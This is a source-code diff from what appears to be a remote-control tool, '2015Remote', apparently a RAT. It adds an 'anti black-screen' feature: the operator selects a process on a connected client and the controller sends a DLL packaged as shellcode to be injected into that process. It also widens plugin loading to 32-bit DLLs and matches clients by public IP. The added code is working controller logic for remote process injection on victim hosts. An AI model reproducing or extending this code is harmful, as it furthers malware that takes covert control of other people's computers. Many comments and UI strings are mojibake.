Feature: Support anti black-screen in process management

server/2015Remote/2015RemoteDlg.cpp

@@ -53,6 +53,7 @@
 #define TIMER_CHECK 1
 #define TIMER_CLOSEWND 2
 #define TODO_NOTICE MessageBoxA("This feature has not been implemented!\nPlease contact: 962914132@qq.com", "提示", MB_ICONINFORMATION);
+#define TINY_DLL_NAME "TinyRun.dll"
 
 typedef struct {
     const char*   szTitle;     //列表的名称
@@ -101,6 +102,13 @@ std::string EventName()
     snprintf(eventName, sizeof(eventName), "EVENT_%d", GetCurrentProcessId());
     return eventName;
 }
+std::string PluginPath() {
+    char path[_MAX_PATH];
+    GetModuleFileNameA(NULL, path, _MAX_PATH);
+    GET_FILEPATH(path, "Plugins");
+    return path;
+}
+
 
 //////////////////////////////////////////////////////////////////////////
 
@@ -233,7 +241,7 @@ bool IsDll64Bit(BYTE* dllBase)
 }
 
 // 返回：读取的字节数组指针（需要手动释放）
-DllInfo* ReadPluginDll(const std::string& filename)
+DllInfo* ReadPluginDll(const std::string& filename, const DllExecuteInfo & execInfo = { MEMORYDLL, 0, CALLTYPE_IOCPTHREAD })
 {
     // 打开文件（以二进制模式）
     std::ifstream file(filename, std::ios::binary | std::ios::ate);
@@ -255,11 +263,6 @@ DllInfo* ReadPluginDll(const std::string& filename)
         delete[] buffer;
         return nullptr;
     }
-    if (!IsDll64Bit(dllData)) {
-        Mprintf("不支持32位DLL: %s\n", filename.c_str());
-        delete[] buffer;
-        return nullptr;
-    }
     std::string masterHash(GetMasterHash());
     int offset = MemoryFind((char*)dllData, masterHash.c_str(), fileSize, masterHash.length());
     if (offset != -1) {
@@ -271,7 +274,9 @@ DllInfo* ReadPluginDll(const std::string& filename)
 
     // 设置输出参数
     auto md5 = CalcMD5FromBytes(dllData, fileSize);
-    DllExecuteInfo info = { MEMORYDLL, fileSize, CALLTYPE_IOCPTHREAD, };
+    DllExecuteInfo info = execInfo;
+    info.Size = fileSize;
+    info.Is32Bit = !IsDll64Bit(dllData);
     memcpy(info.Name, name.c_str(), name.length());
     memcpy(info.Md5, md5.c_str(), md5.length());
     buffer[0] = CMD_EXECUTE_DLL;
@@ -282,7 +287,7 @@ DllInfo* ReadPluginDll(const std::string& filename)
 }
 
 DllInfo* ReadTinyRunDll(int pid) {
-    std::string name = "TinyRun.dll";
+    std::string name = TINY_DLL_NAME;
     DWORD fileSize = 0;
     BYTE * dllData = ReadResource(IDR_TINYRUN_X64, fileSize);
 	// 设置输出参数
@@ -477,6 +482,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
     ON_MESSAGE(WM_SHOWMESSAGE, OnShowMessage)
     ON_MESSAGE(WM_SHOWERRORMSG, OnShowErrMessage)
     ON_MESSAGE(WM_INJECT_SHELLCODE, InjectShellcode)
+    ON_MESSAGE(WM_ANTI_BLACKSCREEN, AntiBlackScreen)
     ON_MESSAGE(WM_SHARE_CLIENT, ShareClient)
     ON_MESSAGE(WM_ASSIGN_CLIENT, AssignClient)
     ON_MESSAGE(WM_ASSIGN_ALLCLIENT, AssignAllClient)
@@ -2224,7 +2230,7 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
     }
     case CMD_EXECUTE_DLL: { // 请求DLL（执行代码）【L】
         DllExecuteInfo *info = (DllExecuteInfo*)ContextObject->InDeCompressedBuffer.GetBuffer(1);
-        if (std::string(info->Name) == "TinyRun.dll") {
+        if (std::string(info->Name) == TINY_DLL_NAME) {
 			auto tinyRun = ReadTinyRunDll(info->Pid);
 			Buffer* buf = tinyRun->Data;
             ContextObject->Send2Client(buf->Buf(), tinyRun->Data->length());
@@ -2238,6 +2244,12 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
                 ContextObject->Send2Client(dll->Data->Buf(), dll->Data->length());
                 break;
             }
+        }
+		auto dll = ReadPluginDll(PluginPath() + "\\" + info->Name, { SHELLCODE, 0, CALLTYPE_DEFAULT, {}, {}, info->Pid, info->Is32Bit });
+        if (dll) {
+            Buffer* buf = dll->Data;
+            ContextObject->Send2Client(buf->Buf(), dll->Data->length());
+            SAFE_DELETE(dll);
         }
         Sleep(20);
         break;
@@ -3841,7 +3853,7 @@ context* CMy2015RemoteDlg::FindHostByIP(const std::string& ip) {
 	EnterCriticalSection(&m_cs);
 	for (auto i = m_HostList.begin(); i != m_HostList.end(); ++i) {
 		context* ContextObject = *i;
-        if (ContextObject->GetClientData(ONLINELIST_IP) == clientIP) {
+        if (ContextObject->GetClientData(ONLINELIST_IP) == clientIP || ContextObject->GetAdditionalData(RES_CLIENT_PUBIP) == clientIP) {
             LeaveCriticalSection(&m_cs);
 			return ContextObject;
         }
@@ -3860,10 +3872,36 @@ LRESULT CMy2015RemoteDlg::InjectShellcode(WPARAM wParam, LPARAM lParam){
 
 void CMy2015RemoteDlg::InjectTinyRunDll(const std::string& ip, int pid){
 	auto ctx = FindHostByIP(ip);
-	if (ctx == NULL)return;
+    if (ctx == NULL) {
+        MessageBoxA(CString("没有找到在线主机: ") + ip.c_str(), "提示", MB_ICONINFORMATION);
+        return;
+    }
 
     auto tinyRun = ReadTinyRunDll(pid);
 	Buffer* buf = tinyRun->Data;
 	ctx->Send2Client(buf->Buf(), 1 + sizeof(DllExecuteInfo));
     SAFE_DELETE(tinyRun);
 }
+
+LRESULT CMy2015RemoteDlg::AntiBlackScreen(WPARAM wParam, LPARAM lParam) {
+	char* ip = (char*)wParam;
+    std::string host(ip);
+    std::string arch = ip + 256;
+	int pid = lParam;
+	auto ctx = FindHostByIP(ip);
+    delete ip;
+    if (ctx == NULL) {
+        MessageBoxA(CString("没有找到在线主机: ") + host.c_str(), "提示", MB_ICONINFORMATION);
+        return S_FALSE;
+    }
+    bool is32Bit = arch == "x86";
+    std::string path = PluginPath() + "\\" + (is32Bit ? "AntiBlackScreen_x86.dll" : "AntiBlackScreen_x64.dll");
+    auto antiBlackScreen = ReadPluginDll(path, { SHELLCODE, 0, CALLTYPE_DEFAULT, {}, {}, pid, is32Bit });
+    if (antiBlackScreen) {
+        Buffer* buf = antiBlackScreen->Data;
+        ctx->Send2Client(buf->Buf(), 1 + sizeof(DllExecuteInfo));
+        SAFE_DELETE(antiBlackScreen);
+    }else
+        MessageBoxA(CString("没有反黑屏插件: ") + path.c_str(), "提示", MB_ICONINFORMATION);
+    return S_OK;
+}

server/2015Remote/2015RemoteDlg.h

@@ -300,6 +300,7 @@ public:
     afx_msg LRESULT OnOpenDrawingBoard(WPARAM wParam, LPARAM lParam);
     afx_msg LRESULT UPXProcResult(WPARAM wParam, LPARAM lParam);
     afx_msg LRESULT InjectShellcode(WPARAM wParam, LPARAM lParam);
+    afx_msg LRESULT AntiBlackScreen(WPARAM wParam, LPARAM lParam);
     afx_msg LRESULT ShareClient(WPARAM wParam, LPARAM lParam);
     LRESULT assignFunction(WPARAM wParam, LPARAM lParam, BOOL all);
     afx_msg LRESULT AssignClient(WPARAM wParam, LPARAM lParam);

server/2015Remote/SystemDlg.cpp

@@ -16,6 +16,7 @@ typedef struct ItemData {
     {
         return Data[index];
     }
+    CString Arch;
 } ItemData;
 
 IMPLEMENT_DYNAMIC(CSystemDlg, CDialog)
@@ -52,6 +53,7 @@ BEGIN_MESSAGE_MAP(CSystemDlg, CDialog)
     ON_COMMAND(ID_WLIST_MAX, &CSystemDlg::OnWlistMax)
     ON_COMMAND(ID_WLIST_MIN, &CSystemDlg::OnWlistMin)
     ON_COMMAND(ID_PLIST_INJECT, &CSystemDlg::OnPlistInject)
+    ON_COMMAND(ID_PLIST_ANTI_BLACK_SCREEN, &CSystemDlg::OnPlistAntiBlackScreen)
 END_MESSAGE_MAP()
 
 
@@ -75,6 +77,7 @@ BOOL CSystemDlg::OnInitDialog()
         m_ControlList.InsertColumn(0, "ӳ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>", LVCFMT_LEFT, 180);
         m_ControlList.InsertColumn(1, "PID", LVCFMT_LEFT, 70);
         m_ControlList.InsertColumn(2, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD>", LVCFMT_LEFT, 320);
+        m_ControlList.InsertColumn(3, "<EFBFBD>ܹ<EFBFBD>", LVCFMT_LEFT, 70);
         ShowProcessList();   //<2F><><EFBFBD>ڵ<EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ<EFBFBD><CFA2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ž<EFBFBD><C5BD>̵<EFBFBD><CCB5><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>԰<EFBFBD><D4B0><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʾ<EFBFBD><CABE><EFBFBD>б<EFBFBD><D0B1><EFBFBD><EFBFBD><EFBFBD>\0\0
     } else if (m_bHow==TOKEN_WSLIST) { //<2F><><EFBFBD>ڹ<EFBFBD><DAB9><EFBFBD><EFBFBD><EFBFBD>ʼ<EFBFBD><CABC><EFBFBD>б<EFBFBD>
         //<2F><>ʼ<EFBFBD><CABC> <20><><EFBFBD>ڹ<EFBFBD><DAB9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>б<EFBFBD>
@@ -123,8 +126,8 @@ void CSystemDlg::ShowProcessList(void)
 {
     Buffer tmp = m_ContextObject->InDeCompressedBuffer.GetMyBuffer(1);
     char	*szBuffer = tmp.c_str(); //xiaoxi[][][][][]
-    char	*szExeFile;
-    char	*szProcessFullPath;
+    const char	*szExeFile;
+    const char	*szProcessFullPath;
     DWORD	dwOffset = 0;
     CString str;
     DeleteAllItems();
@@ -133,15 +136,17 @@ void CSystemDlg::ShowProcessList(void)
     for (i = 0; dwOffset < m_ContextObject->InDeCompressedBuffer.GetBufferLength() - 1; ++i) {
         LPDWORD	PID = LPDWORD(szBuffer + dwOffset);        //<2F><><EFBFBD><EFBFBD><EFBFBD>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD>ID
         szExeFile = szBuffer + dwOffset + sizeof(DWORD);      //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ID֮<44><D6AE><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+        auto arr = StringToVector(szExeFile, ':', 2);
         szProcessFullPath = szExeFile + lstrlen(szExeFile) + 1;  //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǽ<EFBFBD><C7BD><EFBFBD><EFBFBD><EFBFBD>֮<EFBFBD><D6AE><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
         //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݽṹ<DDBD>Ĺ<EFBFBD><C4B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 
-        m_ControlList.InsertItem(i, szExeFile);       //<2F><><EFBFBD>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݼ<EFBFBD><DDBC>뵽<EFBFBD>б<EFBFBD><D0B1><EFBFBD><EFBFBD><EFBFBD>
+        m_ControlList.InsertItem(i, arr[0].c_str());       //<2F><><EFBFBD>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݼ<EFBFBD><DDBC>뵽<EFBFBD>б<EFBFBD><D0B1><EFBFBD><EFBFBD><EFBFBD>
         str.Format("%5u", *PID);
         m_ControlList.SetItemText(i, 1, str);
         m_ControlList.SetItemText(i, 2, szProcessFullPath);
+        m_ControlList.SetItemText(i, 3, arr[1].empty() ? "N/A" : arr[1].c_str());
         // ItemData Ϊ<><CEAA><EFBFBD><EFBFBD>ID
-        auto data = new ItemData{ *PID, {szExeFile, str, szProcessFullPath} };
+        auto data = new ItemData{ *PID, {arr[0].c_str(), str, szProcessFullPath}, arr[1].c_str() };
         m_ControlList.SetItemData(i, DWORD_PTR(data));
 
         dwOffset += sizeof(DWORD) + lstrlen(szExeFile) + lstrlen(szProcessFullPath) + 2;   //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ݽṹ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>ѭ<EFBFBD><D1AD>
@@ -484,3 +489,36 @@ void CSystemDlg::OnPlistInject()
     ASSERT(m_pParent);
     m_pParent->PostMessageA(WM_INJECT_SHELLCODE, (WPARAM)new std::string(m_ContextObject->PeerName), dwProcessID);
 }
+
+
+void CSystemDlg::OnPlistAntiBlackScreen()
+{
+	CListCtrl* ListCtrl = NULL;
+	if (m_ControlList.IsWindowVisible())
+		ListCtrl = &m_ControlList;
+	else
+		return;
+
+	if (ListCtrl->GetSelectedCount() != 1)
+		::MessageBox(m_hWnd, "ֻ<EFBFBD><EFBFBD>ͬʱ<EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̽<EFBFBD><EFBFBD>з<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!", "<EFBFBD><EFBFBD>ʾ", MB_ICONINFORMATION);
+
+	if (::MessageBox(m_hWnd, "ȷ<EFBFBD><EFBFBD>Ҫ<EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̽<EFBFBD><EFBFBD>з<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?\n<EFBFBD><EFBFBD>ȷ<EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̡<EFBFBD>DLL<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ض˼ܹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͬ!",
+		"<EFBFBD><EFBFBD><EFBFBD><EFBFBD>", MB_YESNO | MB_ICONQUESTION) == IDNO)
+		return;
+
+	DWORD	dwOffset = 1, dwProcessID = 0;
+	POSITION Pos = ListCtrl->GetFirstSelectedItemPosition();
+    CString arch;
+	if (Pos) {
+		int	nItem = ListCtrl->GetNextSelectedItem(Pos);
+		auto data = (ItemData*)ListCtrl->GetItemData(nItem);
+		dwProcessID = data->ID;
+        arch = data->Arch;
+		dwOffset += sizeof(DWORD);
+	}
+	ASSERT(m_pParent);
+    char *arg = new char[300]();
+    memcpy(arg, m_ContextObject->PeerName.c_str(), m_ContextObject->PeerName.length());
+    memcpy(arg + 256, arch, arch.GetLength());
+	m_pParent->PostMessageA(WM_ANTI_BLACKSCREEN, (WPARAM)arg, dwProcessID);
+}

server/2015Remote/SystemDlg.h

@@ -47,4 +47,5 @@ public:
     afx_msg void OnWlistMin();
     afx_msg void OnSize(UINT nType, int cx, int cy);
     afx_msg void OnPlistInject();
+    afx_msg void OnPlistAntiBlackScreen();
 };

server/2015Remote/stdafx.h

@@ -89,6 +89,7 @@
 #define WM_SHARE_CLIENT					WM_USER+3026
 #define WM_ASSIGN_CLIENT				WM_USER+3027
 #define WM_ASSIGN_ALLCLIENT				WM_USER+3028
+#define WM_ANTI_BLACKSCREEN				WM_USER+3029
 
 #ifdef _UNICODE
 #if defined _M_IX86